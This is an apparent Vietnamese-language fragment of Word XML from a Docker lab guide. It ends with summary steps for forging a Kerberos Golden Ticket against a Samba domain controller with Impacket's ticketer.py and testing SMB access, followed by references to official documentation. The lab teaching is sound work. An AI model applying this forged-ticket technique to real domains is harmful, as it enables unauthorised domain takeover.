    <w:p>
      <w:r>
        <w:t>7) ticketer.py tạo goldenadmin.ccache.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>8) KRB5CCNAME trỏ vào CCACHE; thử dịch vụ SMB trong lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>9) Kết luận: vấn đề cốt lõi là mất bí mật krbtgt, Docker chỉ là môi trường mô phỏng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>24. Tài liệu tham khảo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Samba – samba-tool: </w:t>
      </w:r>
      <w:r>
        <w:t>https://www.samba.org/samba/docs/current/man-html/samba-tool.8.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Samba – nowsci/samba-domain: </w:t>
      </w:r>
      <w:r>
        <w:t>https://hub.docker.com/r/nowsci/samba-domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu – Samba AD DC: </w:t>
      </w:r>
      <w:r>
        <w:t>https://ubuntu.com/server/docs/how-to/samba/provision-samba-ad-controller/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MIT Kerberos – kinit: </w:t>
      </w:r>
      <w:r>
        <w:t>https://web.mit.edu/Kerberos/www/krb5-current/doc/user/user_commands/kinit.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MIT Kerberos – klist: </w:t>
      </w:r>
      <w:r>
        <w:t>https://web.mit.edu/kerberos/krb5-devel/doc/user/user_commands/klist.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fortra/Impacket – ticketer.py: </w:t>
      </w:r>
      <w:r>
        <w:t>https://github.com/fortra/impacket/blob/master/examples/ticketer.py</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Lưu ý phiên bản: </w:t>
            </w:r>
            <w:r>
              <w:t>Docker image và package bên thứ ba có thể thay đổi. Nếu một lệnh khác tài liệu, kiểm tra --help và tài liệu chính thức trước khi sửa lab.</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pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="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